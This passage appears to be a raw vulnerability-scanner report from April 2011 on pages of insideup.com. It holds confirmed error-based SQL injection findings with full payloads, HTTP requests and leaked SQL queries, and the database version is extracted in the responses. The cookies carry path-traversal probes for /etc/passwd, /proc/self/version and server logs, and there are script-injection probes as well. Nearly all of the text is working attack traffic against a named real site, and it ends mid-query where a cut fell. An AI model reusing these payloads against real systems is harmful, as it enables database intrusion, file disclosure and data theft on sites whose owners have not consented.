count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from 
lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on 
cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/'Duplicate entry '_!@4dilemma:0' for key 1
- /ppc/leadflow/inco00/project.php

/ppc/leadflow/inco00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/inco00/project.php?catId=60003&iusrc='%2B(select+1+and+row(1%2c..

Parameters

Parameter Type Value
catId GET 60003
iusrc GET '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'

Extracted Data

5.0.45

Request

GET /ppc/leadflow/inco00/project.php?catId=60003&iusrc='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B' HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:27:22 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=kl7inls2vf4bkeo4oip8q21ea1; path=/
Content-Length: 4868
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from 
lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on 
cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/'Duplicate entry '_!@4dilemma:0' for key 1
- /ppc/leadflow/obtm00/project.php

/ppc/leadflow/obtm00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/obtm00/project.php?catId='%2B(select+1+and+row(1%2c1)%3e(select..

Parameters

Parameter Type Value
catId GET '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
iusrc GET iupsc

Extracted Data

5.0.45

Request

GET /ppc/leadflow/obtm00/project.php?catId='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:28:10 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=b7tsop5103jt1e5o5dbviv3lg1; path=/
Content-Length: 4868
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from 
lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on 
